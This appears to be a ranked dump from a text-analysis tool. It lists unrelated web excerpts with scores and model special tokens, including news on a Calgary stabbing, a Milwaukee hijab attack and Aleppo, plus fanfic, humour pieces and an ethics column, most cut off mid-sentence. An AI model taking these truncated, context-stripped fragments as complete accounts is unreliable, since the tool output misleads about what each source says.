case of one surgeon who, Ms Lennon says, was unaware he would have to speak to patients, having previously only encountered them in his home country after they had been put to sleep. + +Find out more + +Watch Catrin Nye's full film on refugee doctors on the Victoria Derbyshire programme's website. + +Laeth Al-Sadi, also on the course, used to be a doctor in the Iraqi army. + +He came to Scotland to study but his life +================================================================================ +Rank = 78; Score = 696320.0 +<|begin_of_text|>Unfortunately for lovers of fantasy epics, hairy feet and stories where dwarves are packed into barrels, Guillermo Del Toro has announced that he's not going to direct the movie version of The Hobbit after all. + +This is tragic. Upon leaving the theater after seeing The Return of the King for the first time, I imagine everyone was thinking the same thing: "Man, that was a freakingly long ending." But after that they thought, "I can't wait to see The Hobbit." It seemed inevitable, and if Peter Jackson wasn't going to direct it, then Del Toro was arguably the best alternative. + +And now Del Toro has left the project. While the movie isn't cancelled, it's wandering aimlessly without a captain, like an abandoned ship or a poorly organized volleyball team. Where will we find a director capable of bringing J.R.R. Tolkien's vision to life? Let's consider the possibilities. What would happen if one of these well-known directors were hired to helm The Hobbit? + +Tim Burton ———- + +Tim Burton's grasp of magic and high weirdness is initially encouraging to fans, but doubt sets in when Johnny Depp is brought on to play Gandalf and decides to base his portrayal on eccentric celebrity Ozzy Osbourne. When Helena Bonham Carter is tapped to play Gollum, hopes take a dive, and the final product is praised for its bold use of color and shapes, but criticized for introducing a 10-minute dream sequence in which Bilbo is chased by a giant ring in a clown suit. + +Terry Gilliam ————- + +The first stills to come out of the production are very promising, but Terry Gilliam's famed bad luck comes into play when, over the course of a single week, a fire destroys the Smaug set, a flash flood wipes out Lake Town, Thorin Oakenshield develops spasmodic dysphonia, and the special-effects budget is cut to about half that of Big Momma's House 3. The movie as released, while flawed and a commercial failure, nonetheless becomes a cult favorite among film students and fisheye lens salesmen. + +George Lucas ———— + +George Lucas decides that this Lord of the Rings prequel is lacking a certain something, and changes the plot to be about Sauron's early life as an adorable toddler caught in the middle of a continent-spanning dispute over water rights. Also, Sauron's best friend is an orc with an exaggerated Mexican accent named Boopily Boodily Moop +================================================================================ +Rank = 79; Score = 692224.0 +<|begin_of_text|>A survey by Comedy Central UK last year showed that parents embarrass their children, on average, a staggering 14 times a week. Pretty much everything about parental behaviour appears to be painfully humiliating these days, from “their age” to “their hobbies”, from “their dance moves” to the undeniable fact that they are, most of the time, “generally uncool”. + +The worst offence, however, is the things parents say in public, whether it is shouting “I love you” at the school gate or telling their teenagers off in front of their friends. + +In Norway, 15-year-old Martin Odegaard does not appear to have this problem. A few weeks ago his dad, Hans Erik, told the press that “more than 30 [of the best clubs in Europe] have made an inquiry” about his son. Whatever the opposite to embarrassing is for a 15-year-old, that comment probably sums it up. Which football loving boy or girl would not love to hear one of their parents say something like that? + +That was on 30 July and the 15-year-old had, by then, started a mere four Norwegian league games for Stromsgodset, the club his father played for too. Since then, the interest in Odegaard has exploded. He has become a YouTube sensation and been interviewed by the international press. He has been called up by the Norway coach, Per-Mathias Hogmo, and is on Wednesday set to become the youngest ever player to represent his country, beating Tormod Kjellsen’s 104-year-old record. + +It is, at this point, important to point out that Hogmo’s squad for the friendly against United Arab Emirates in Stavanger includes only one player playing abroad and, when the big guns return for the game against England next week, Odegaard will not keep his place (unless he is a late addition). The 15-year-old is not quite among the 23 best players in the country. Not just yet. + +To the clubs (or vultures, whichever way you see it) circling around Odegaard, it does not matter. Last weekend, against Stabaek, more than 30 clubs had representatives at the Marienlyst Stadion to watch him play – among them, reportedly, Real Madrid and Liverpool. Stromsgodset lost 3-2 and there has, predictably and understandably, been a debate in Norway on whether such extreme exposure is good for such a young player. As someone pointed out +================================================================================ +Rank = 80; Score = 692224.0 +<|begin_of_text|>CHAPTER 12 – "ARGENTINA" + +Aaahhh, I'm at 12 chapters already! For my first HIMYM fanfic ever! Big hugs and thanks to everyone who's been reading; those amazing reviews are what's been keeping me writing more! I am so glad people are enjoying this; I'm having a blast writing it! I hope you'll like this latest update…and have a great day! + +2015 + +(Ted, Tracy, Marshall and Lily are at the bar. Lily is on the phone, crying.) + +Future Ted (VO): Kids, in the summer of 2015, your mother, the whole gang and I hopped on to a plane to Argentina just hours after we found out your Aunt Robin was sick. + +Argentina + +(Barney is in the waiting rooms in the hospital just outside Robin's room when Ted, Tracy, Marshall and Lily are walking in looking sad.) + +Future Ted (VO): You Uncle Barney, as expected, was acting a little…weird. + +Barney: (loudly, excited) Hey, guys! + +(They all stare at him, confused.) + +Lily: Barney, oh my god! (runs up to him and hugs him) How've you been? + +Barney: Great! How've you been? The boobs are getting bigger, bra-vo, Lily. (gives her a thumb-up) + +Lily: (hits him) What-what is wrong with you?! + +Marshall: Seriously, bro. I mean, there's no wrong time to mention Lily-boobs but…c'mon, bro. + +Barney: (excited) I am serious! Argentina is ah-mazing, guys! Let's go sightseeing, come on! + +Ted: (stops him) Barney! We're here to see you and Robin. This isn't some vacation. + +Barney: Why can't it be both? + +Tracy: Where is Robin, and I'm gonna be the only one of us with literal balls to ask you, are you high? + +Barney: Robin's great! She's sleeping now so we can't really see her right now and I mean, she's not really great. I mean, it's cancer so it can't be really great, am I right fellas? (chuckles) But she's great. We're great. I am…you know… (looks up, confused) what's the word? + +Marshall: Great? + +Barney: YES! Thank you, Judge Fudge! + +(Marshall +================================================================================ +Rank = 81; Score = 692224.0 +<|begin_of_text|>View Full Version : [Anime] Episode 51:... + +The Small One Okay, here a very short summary of what happened in the last episode: + +Al stands up and walks to Ed, he claps his hands and the whole room becomes full of transmutation circles. + +Mustang is loosing to the Führer, when the son appears with the thing from the save. The Führer gets angry and chokes his son. Mustang intervenes, he takes a skull from the bag of the son and kills the Führer. + +On his way out, Archer is standing in his way. Hawkeye kills Archer. + +Ed is standing in a nothingness. Al appears before him, but vanishes. Then Envy appears and wonders where he is. Ed answers they are standing before the gate. Envy asks where it leads to, and after he hears that Hohenheim is on the other side, he opens the gate and goes inside. + +Ed awakes with a perfect body and Al is nowhere to see. + +Dante is escaping in the Elevator, when mindless-Gluttony eats itself through the bottom... he looks very hungry. Dante claps her hands... when the Elevator arrives its empty. + +After telling Roze to excape and take Wrath with her, Ed does some transmutation on himself. + +Result: + +Al in his old body with no memory of what happened. + +Mustang lost his left eye. + +Hohenheim and Ed (with Automail again) are living together in München (1921). + +Wrath with Automail is living on the steets. + +Tucker with his lifeless Nina is practicing to draw Soul-Transmutation Circles on a wall. + +In the End both AL and Ed are sitting in a train and talking to themselves that they will meet again. + +huh so the movie will focus on Al and ed than??? :confused: + +Hoshi I have a question: + +and Winry? + +She rest in Resembool??? + +Pai Ed and Al separated? :sad: BTW It seems a very good end. But.. Too many months to the movie DAMN + +michiru Umm....In short....... + +Ed---to this world.Alive. + +Al---revived but lost memories for 4 years. + +Roy---got his left eye injured.Alive. + +Hawkeye---LOVE LOVE with Roy(lol).Alive. + +Roze---Alive. + +Wrath---Full metal Wrath!?Alive but disappeared. + +Dante---was eaten by Gluttony +================================================================================ +Rank = 82; Score = 692224.0 +<|begin_of_text|>Research Miscellaneous + +You know you’ve been in Sweden too long, when... It's acceptable to eat lunch at 11.00. You think Leif 'Loket' Olsson is entertaining. You rummage through your plastic bag collection to see which ones you should keep to take to the store and which can be sacrificed to garbage. You associate pea soup with Thursday. The first thing you do on entering a bank/post office/pharmacy etc. is look for the queue number machine. You accept that you will have to queue to take a queue number. A sharp intake of breath has become part of your vocabulary, as has the sound 'ahh'. You associate Friday afternoon with a trip to system bolaget. You think nothing of paying $50 for a bottle of 'cheap' spirits at system bolaget. Silence is fun. Your native language has seriously deteriorated; you begin to "eat medicine" and "hire videos". Your front door step is beginning to resemble a shoe shop. When a stranger on the street smiles at you, you assume that: + +a. he is drunk; + +b. he is insane; + +c. he is American; + +d. he is all of the above. You stay home on Saturday night to watch Bingolotto. It seems sensible that the age limit at Stockholm night clubs is 23 or 25. The reason you take the ferry to Finland is: + +a. duty free vodka + +b. duty free beer + +c. to party The only reason for getting of the boat in Helsinki is to eat pizza. It no longer seems excessive to spend $200 on alcohol in a single night. The fact that all of the "v's" and the "w's" are together in the phone directory seems right. You care who wins 'Expedition: Robinson'. Your old habit of being "fashionably late" is no longer acceptable. You are always on time. You no longer see any problem wearing white socks with loafers. You know that "religious holiday" means "let's get pissed." You are no longer scared of volvos and volvo drivers. You have your own innebandy club. You enjoy the taste of surstr�mming. You find yourself debating the politics of Carl Bildt. You use mmmm as a conversation filler. An outside temperature of 9 degrees Celsius is mild. When someone asks for "three cheers", you say "hoorah, hoorah, hoorah, hoorah". You wear sandals with socks +================================================================================ +Rank = 83; Score = 688128.0 +<|begin_of_text|>Food safety experts have written an open letter to supermarkets calling on them to introduce a plastic-free aisle in their stores. + +The campaign, launched by environment group A Plastic Planet, has the backing of doctors, scientists and a host of celebrities to highlight the potential dangers of chemicals from plastic leaking into food. + +People more aware of plastics danger + +The group's organiser Sian Sutherland, told Sky News: "The one thing we can't do now is push our trolleys to get our meat, our fruit and fish in a plastic-free aisle. + +"There is increasing scientific evidence to say there could be seepage from plastic into our food. + +:: Plastic waste on beaches underestimated by 80% - study + +"We want to work with supermarkets to prove that consumers will want to shop in a plastic-free aisle. + +"So many people complain to me about how they are filling their bins with plastic packaging when they get their food home from the supermarket. + +"There is a sea of plastic, most of which will be used just one time and then will be on our planet forever. + +"Supermarkets want to give us choice and now we want the choice between buying our food in plastic or not. We need a bold move and we can vote with our wallets." + +Ocean Rescue: Isabel's plastic challenge + +Every day eight million tonnes of plastic is dumped into oceans and it is estimated by 2050 there will be more plastic by weight in the sea than fish. + +:: Sky Ocean Rescue: How can we solve the problem? + +Some scientists believe plastics are having an impact on people's health as they become exposed to chemicals such as phthalate and BPA - an industrial chemical used to make plastics - which may cause cancer, metabolic and cognitive behaviour disorders. + +Documentary: Plastics danger to islands' shores + +A Plastic Planet is calling for people to video themselves on their phone saying, "I am a plastic addict but I am ready for change. I want a plastic-free aisle", and post it on their website aplasticplanet.com + +Sky News launched its Sky Ocean Rescue campaign earlier this year aimed at reducing the amount of plastic waste that ends up in the world's seas. + +:: You can find out more about the Sky Ocean Rescue campaign and how to get involved at www.skyoceanrescue.com<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 84; Score = 679936.0 +<|begin_of_text|>Darkness comes early to the streets of this ancient city, once a symbol of Syria’s richly storied past and now at the heart of the deepening nightmare that the country’s revolution has become. + +By 5 p.m., people are scurrying home, down streets potholed by artillery, past piles of rubble and mountains of garbage that hasn’t been collected in months, to spend the evenings huddled in the cold without heat, light or, increasingly, food. + +“We just lie under blankets because it is so cold. We have no work, no money and no life,” said Omar Abu Mohammed, 55, one of the few remaining residents of his badly bombed neighborhood, as he prepared to head indoors for the night. + +“It is time to go now because soon there will be snipers,” he added, as a shell boomed softly in the distance. + +Shells are exploding somewhere in Aleppo most of the time, but after five months of fighting, people have become inured to the ever-present threat. Rain and cloudy skies have deterred warplanes, providing some relief from the airstrikes that can wipe out whole apartment buildings, along with their inhabitants, in an instant. + +But the onset of this second winter since Syrians rose up against their government 22 months ago is bringing new calamity to a people already ground down by violence and war. Hunger, cold and disease are emerging as equally profound challenges in the desperate daily struggle that life has become for millions, not only in Aleppo but across Syria, where the quest for greater freedoms sparked by the Arab Spring has gone badly, horribly wrong. + +“You can hide from the shelling, but if your child is hungry and there is no bread, what can you do?” asked Abdullah Awuf, 29, a driver who struggles to feed his infant son amid sky-high prices for fuel and food. + +Aleppo is not the only place in Syria where conditions are dire. Across the country, reports are emerging of people foraging for food in garbage, stripping buildings for firewood and queuing for hours for scarce bread as the government-run distribution network breaks down. + +The United Nations appealed last week for $1.5 billion to help 4.5 million needy Syrians, a record amount for an emergency, said Panos Moumtzis, the regional relief coordinator for the U.N. refugee agency. This one is unfolding almost entirely out of sight because most places are too dangerous or inaccessible for aid workers or journalists to visit. + +Most of the relief money, $1 billion, will be +================================================================================ +Rank = 85; Score = 679936.0 +<|begin_of_text|>During Bellator 145, King Mo’s entry to the RIZIN FIGHTING WORLD GRAND-PRIX 2015 and Gabi Garcia vs Lei’D Tapa’s matchup was announced. + +On November 6th, Bellator 145 – VENGEANCE was held at the Scottrade Center St. Louis, Missouri. + +Right before the co-main event, RIZIN chairman Nobuyuki Sakakibara, Gabi Garcia, Lei’D Tapa and King Mo entered the cage. + +Chairman Sakakibara announced that RIZIN will be aired on Spike TV, and that many big names will participate in the event on New Year’s Eve. The host followed by mentioning that King Mo will be participating in the RIZIN FIGHTING WORLD GRAND-PRIX 2015 tournament representing Bellator, and the matchup between Gabi Garcia vs Lei’D Tapa. + +After receiving the Tournament Qualifier board, he stated that “I am happy to be able to fight in Japan. I will become king in Japan as well”. The crowd showed their support with loud cheering and applause. Gabi Garcia and Lei’D Tapa had an intense stare down and quickly got into fight mode. + +During the post-fight press conference King Mo said “I am going to Japan and I am going to be the best. I am going to be the best for Japanese fans and I am going to fight hard to get that prize money. + +Gabi Garcia, with a confirmed opponent, “I am glad I have a chance to fight Tapa. This is going to be a very tough fight for both of us. She is strong, but I am strong too! She is not easy, but I am ready. I am going to fight for Japan, for my family, for my soul”. + +Lei’D Tapa stated “I am so excited! I know it’s is going to be a challenge for me. Gabi is a professional Jiu Jitsu fighter and I am a pro wrestler, we have different style. But I am training very hard with American Top Team in Florida, we training very hard to prepare for Japan, and I will do anything it takes for the win. + +RIZIN Fighting Federation Chairman finished by mentioning “This is going to be an intense fight. This will be the fight that everybody will be wanting to witness. Tapa is a fighter with lots of potential, and is not a pushover fight for Gabi.” Who will be entitled as the “Toug +================================================================================ +Rank = 86; Score = 679936.0 +<|begin_of_text|>The familiar telephone seems the least likely thing you'd associate with the supernatural, but over the years, there have been literally hundreds of reports of ghosts ringing up people, and that is the subject of this collection of Strange But True tales: phone calls from the dead... + +In 1969, a New Jersey rock musician named Karl Uphoff received a phone call from his grandmother; nothing unusual about that you might think, but Karl's Gran had passed away two days earlier. Karl was eighteen at the time of the phantom call, and there had always been a special bond between him and his Gran, who was deaf. She used to phone up Karl's friends and ask: 'Is Karl There?' but because she knew she wouldn't be able to hear the reply, Karl's Gran would then say, 'Tell him to come home at once.' Karl's friends were always irritated by the deaf old woman's constant calling, and used to tell Karl he shouldn't have given his Gran their phone numbers. + +One day Karl's Gran passed away and the teenager was naturally upset, but he had no leanings towards spiritualism, and obviously never expected to hear from his Gran ever again. But Karl was wrong. One evening in 1969, Karl was with his friends in the basement of an apartment in Montclair, New Jersey, when the mother of his friend came down and said that Karl was wanted on the phone. When Karl went upstairs he talked to the old woman and realised he was talking to his Gran, who had recently died. Before he could ask her how she could talk to him when she was dead, the woman hung up. Many more calls followed, but on each occasion, when Karl's Gran was asked how she was still able to communicate, or what the 'other side' was like, the old woman would hang up. In the end, the calls stopped, but Karl felt that his Gran was still watching over him. + +Another chilling phone call from beyond the grave allegedly occurred in Wilmslow, Cheshire in 1977, when a young woman named Mary Meredith received a call at her home from her cousin Shirley in Manchester. Mary shuddered when she heard Shirley's voice on what sounded like a bad line, because only minutes before, Mary had received a telephone call from her aunt telling her of Shirley's tragic death in a car crash just an hour ago. Again, before the phantom caller could be questioned, she hung up. + +In 1995, a radio station in Liverpool, England featured a medium named James +================================================================================ +Rank = 87; Score = 675840.0 +<|begin_of_text|>A year ago I sat in a room with a downcast Adam Badowski, studio head of CD Projekt Red, and we talked about The Witcher 3 'graphics downgrade'. He wanted his game to visually knock people's socks off but instead it faced criticism. + +Something he said stuck with me. He said, and I'm paraphrasing here: you wait until expansion two - then you'll see what we can really do. + +Now the wait is over: expansion two - Blood and Wine - is nearly here (it's out 31st May). Moreover, I've played it. And not only is it beautiful - a postcard of a place inspired by Southern France, drenched in colour and sun - it's actually technically more accomplished to boot. + +"Generally it is a graphics upgrade from the base game," senior environment artist Len de Gracia told me. "We have employed methods that we did not implement in the base game. You can literally bring your camera up to a wall now and the textures would be crisp - at least in most cases. + +"80, 85, probably even 90 per cent of the assets - in terms of environment that you find in this game - are brand new. You can just look at the market stalls right now: you would never see the same market stalls in the base game. For the longest time we were like, 'I want this, I want that,' and finally we got this chance - we got this room to incorporate other people. We have probably 20 times the amount of vegetables we used to! + +"We just wanted to show that we can actually push it to the limit this time." + +You shouldn't see anything that looks similar in Toussaint to in the base Witcher 3 game. All the vegetation and architecture in this whimsical land (that's bigger than Skellige) are different, even the props and lighting. And if something has been reused it should be so heavily masked you don't notice. + +That's wonderful but also worrying. Worrying because consoles struggled with the base Witcher 3 game and needed patches to stabilise performance. If Blood and Wine is even more visually impressive than base Witcher 3, what does that mean for consoles - that they're in for a rough time? + +:: The best Xbox One deals of Black Friday 2018 + +"No, actually," Len de Gracia replied. "We also got really organised. It's like a fresh development. Blood and Wine we literally started from scratch. The mistakes we went through +================================================================================ +Rank = 88; Score = 675840.0 +<|begin_of_text|>Ebenezer Choebefu and his wife heard a young girl screaming outside their home on Sunday night, crying out that "my daddy has killed my mummy and my auntie." + +The girl was fleeing from a residence in the 6400 block of Penbrooke Dr, S.E., where two women were stabbed to death Sunday night and a third hospitalized with her injuries. + +"She was screaming, ‘my daddy has killed my mummy and my auntie. And she just kept repeating that," Choebefu said. + +The girl was outside the home where the attacks happened when she screamed for help, he said. When the girl saw Choebefu’s wife, she ran into her arms. + +"(She) kept screaming, ‘my mommy is inside and she’s dead." + +The child, about nine or 10 years old, according to Choebefu, told his wife that her mom and aunt hid from her dad in a room but he forced his way inside. + +Police were called to the residence about 6:30 p.m. Sunday following reports of a confrontation. They found one woman dead at the scene and another seriously injured. She was rushed to Foothills Hospital but later died. + +Neighbour Olivia Rodrigues was the first to reach the mortally injured woman, who had managed to get outside the residence. + +"I came flying out of my house," she said. "I saw a young lady lying on the sidewalk bleeding out." + +Rodrigues yelled at her fiancé to get a first aid kit and she quickly applied pressure to the woman’s wounds, which were on her upper body, until paramedics arrived. + +Rodrigues said that as she applied pressure, the injured woman asked for her mom. + +"The only thing she said was, ‘I want my mom. It hurts. I want my mommy, I want my mom.’ " + +Rodrigues’s fiancé, meanwhile, rushed to help a second stabbed woman who Rodrigues said was lying at the duplex’s side door. + +The couple’s efforts were in vain, she said. + +"It didn’t help. There was nothing we could have done." + +Police said the woman who died in hospital was Fahmida Velji-Visram, 29, of Calgary. She was a friend of the victim who died at the scene. + +That woman, believed to be the estranged wife of a man police have in custody, has not been named. + +The third woman attacked was a landlord who lived directly above the residence. Police said she was stabbed when she tried +================================================================================ +Rank = 89; Score = 667648.0 +<|begin_of_text|>Please enable Javascript to watch this video + +MILWAUKEE -- A Muslim woman was attacked as she walked home from prayer. Milwaukee police tell FOX6 News they are investigating the crime that occurred near South 13th and Layton. The incident happened Monday morning, April 10th around 6:00 a.m. -- and the victim was just released from the hospital Tuesday afternoon. The details of the crime have some in the Islamic community saying it was a hate crime. + +"I said to myself, 'I am going to die today for sure.' So he gets up from the car and told me to come here," said the woman who was attacked. + +The woman, who does not want her identity to be shared, said a car pulled up alongside her. + +"And one man came from a car," she said. + +That man wanted only one thing: to remove the woman's hijab, or head scarf. + +"He said to take my hijab, my scarf. I tried to fight him. 'Don't take my hijab,' you know? So he threw me on the floor then he beat me like an animal," said the victim. + +The attacker was able to pull the scarf off. Blood stains remained on it Tuesday: + +The woman said her attacker threw her to the sidewalk, and then stepped down on her head repeatedly. She described him taking out a knife to cut her jacket and her arm. + +"Certainly we're scared for our community members. As an Islamic community, we want to make sure our community is always safe. The initial reaction is shock," said Munjed Ahmad with the Islamic Society of Milwaukee. + +Those at the Islamic Center will discuss having security patrols on nearby streets. At this point, they believe this to be a hate crime. + +"Nothing was stolen. There was no robbery. Her valuables remain with her. The only motive we can think of -- because everything stayed with her and this individual went straight for her scarf is a hate crime," said Ahmad. + +Those from the community are glad the attacker didn't take more -- the woman's life. + +The victim somehow made it home. That's where she had a seizure and was taken to the hospital. She said during the beating, the attacker was calling her names and swearing at her. + +Police say they are investigating and there is no suspect in custody at this time. + +Monitor FOX6 News and FOX6Now.com for updates on this developing story.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 90; Score = 667648.0 +<|begin_of_text|>It has been routine from a sub-group who regard non-Muslim women in skimpy clothing as provocateurs and fair game. I have page after page of testimony from witnesses - mothers, teachers and girls - about this phenomenon in Cronulla. The same teacher is also certain that the spark that lit the Cronulla riot on December 11 was not the one broadcast around the world the next day. "People just didn't decide to bash someone who looked Lebanese. It all started when this guy outside Northies shouted, 'I'm going to blow youse all up.' That's what started the pack attacking him. It wasn't racial hatred. After September 11, people are much more sensitive about that kind of threat." + +I've heard similar versions from three people who know many who attended the demonstration on December 11. It will be interesting to see what emerges in court. "It's so disturbing," the teacher said, "the images distributed around Australia and the world, that none of the beatings, the provocations, the filth, were even discussed. The straw that broke the camel's back was not the assault on the two life-savers the previous Sunday [December 4]. The text messages really started to fly after the assault the following Wednesday. "I saw the whole thing. At 4.15pm a group of Lebanese were hanging around the showers at the car park. There were about 25 to 30 of them. A local guy, about 40, was walking by and said something. One of them punched him in the head from behind. When the Anglo guy turned around and started to defend himself, they swarmed on him. He went into a foetal position and they were all kicking him. Another guy went to assist him and he was attacked … + +"Then they all jumped into their cars and left. There was one number plate that stuck in my memory because it was so ridiculous - HTN WET - hot and wet. I ran into the police station and said I could identify them. I could pick one of them out by his tattoos down his arm. They were very distinctive … "The police told everyone to just go home, even though there were bystanders who were saying they could identify the attackers, and people were saying this was the same group which attacked the lifesavers the previous Sunday. It was almost as if they didn't care what we had to say. I was not contacted by one person and I went into the police station twice … Maybe nothing is ever done here because this +================================================================================ +Rank = 91; Score = 667648.0 +<|begin_of_text|>The class-warfare debate that flared up after the release of the Mitt Romney video really got its start this cycle many months ago, when Elizabeth Warren made some remarks about taxes and the rich that went viral.They focused attention on fundamental questions about government, the true nature of individual success, and our shared responsibilities to one another — a debate that took a sharp turn in another direction with the Romney video. + +So I checked in with Warren for her take on Romney’s comments. + +“Romney just wrote off half the people in Massachusetts and half the people in America as deadbeats,” Warren told me. “This is a separate category of contempt for half of our fellow citizens.” + +“He doesn’t understand that millions of these people are working their hearts out, and paying plenty in taxes,” Warren continued, meaning many people pay no federal income taxes do pay other taxes. She added Romney has “no recognition of what people’s lives are really like.” + +Warren said Romney’s comments clarified the choice voters face this fall. “It’s a party that says, `I’ve got mine and the rest of you are on your own,’ versus those who say, `We’re all in this together,’” she said. “There’s a clear choice in this election, between those who believe that to build an economy, the rich and powerful should get richer and more powerful, with tax cuts for the wealthiest and deregulation, while everyone else is left to pick up the pieces.” + +Warren has taken the lead in three polls against Brown, and Brown has not cracked 46 percent in any them — potentially dangerous territory for an incumbent — but she rebuffed all questions about polling. Asked to address recent reports that some Dems are pressuring her to shift her strategy, out of fear that Brown is defining himself as likeable and above partisanship, Warren suggested she’d stick to her course. “I’m out there every day, working for every vote in the Commonwealth,” she said. “I would be doing that if I were down 20 points or up 20 points.” + +However, Warren did recently become the first of the two candidates to release an ad taking direct aim at the opponent. The ad, which charges that Brown sides with big money interests, prompted Republicans to say she has gone “negative,” showing she is well aware this race remains a dead heat in which Brown could still prevail. Asked to respond, Warren suggested it’s fair to draw a sharp contrast on issues. + +“I’m talking about the issues,” Warren said. “The central issue in this +================================================================================ +Rank = 92; Score = 663552.0 +<|begin_of_text|>You say that this man can’t express himself in normal sentences. But can he effectively say no? In your account, the man, despite his deficits and significant aphasia, also seems to have appropriate and coherent beliefs and desires: He knows he has a child, wants to see that child and grieves because that child has been kept from him. You don’t give us reason to think that, in a sexual situation, he wouldn’t be able convey the sentiment ‘‘I don’t want this.’’ For that matter, we don’t know whether he or the woman initiated the sexual activity. + +I’m suggesting that sex involving the cognitively disabled isn’t, ipso facto, assault. I’m not concluding that what happened here was right. Even if the sex itself wasn’t violative, the man may not have been in a position to discuss whether he wanted to have a child with this woman, and therefore to think about contraception. If the woman knew this, she wronged him. (You don’t discuss her motives here, except to say they don’t have a relationship. If she had been trying to get access to his resources — his financial situation is comfortable, you say — this would be a further wrong: exploiting another person’s vulnerabilities to your own advantage.) + +A second question is whether she should allow him to see the child more often. That he’s heartbroken not to see his offspring more isn’t the only relevant consideration. There is also, centrally, the issue of what is good for the child and reasonably convenient for the mother. Because he sees the child sometimes, the mother presumably doesn’t think that the visits are harmful; it would probably be kind to permit more. Whether it would be easy for her to do so, I am not in a position to judge, and perhaps you aren’t, either. + +None of this settles the hovering question you didn’t ask, which is what, if anything, you should do. Do you have sufficient connection with these people to be entitled to intervene in their lives? How sure are you of the facts here? Would it do any good to the child or to his father to have the mother charged as a sex offender? Do you have the standing with the mother to urge her to allow the father more time with the child? + +Here’s a suggestion. You know about these events because you and these people belong to the same church. Wouldn’t it make sense to bring these questions to your pastor? He or she could then take up with the child’s mother whatever concerns +================================================================================ +Rank = 93; Score = 663552.0 +<|begin_of_text|>Man fined for killing and eating puppy + +Updated + +A Kimberley man has escaped jail for roasting and eating a puppy on the banks of the Fitzroy River. + +Passers-by watched in horror as a 28-year-old man killed the puppy with a blunt steak knife, then roasted it on a campfire and ate it. + +They phoned police, saying it appeared the animal suffered a slow and painful death. + +The court was told he committed the act because he was hungry. + +The man was charged with ill-treating an animal contrary to the Welfare Act, which carries a maximum penalty of five years in jail and a $50,000 fine. + +After a year of counselling, the Fitzroy Crossing Magistrate yesterday fined him $2,500, which is just above the minimum penalty. + +Topics: animal-welfare, fitzroy-crossing-6765 + +First posted<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_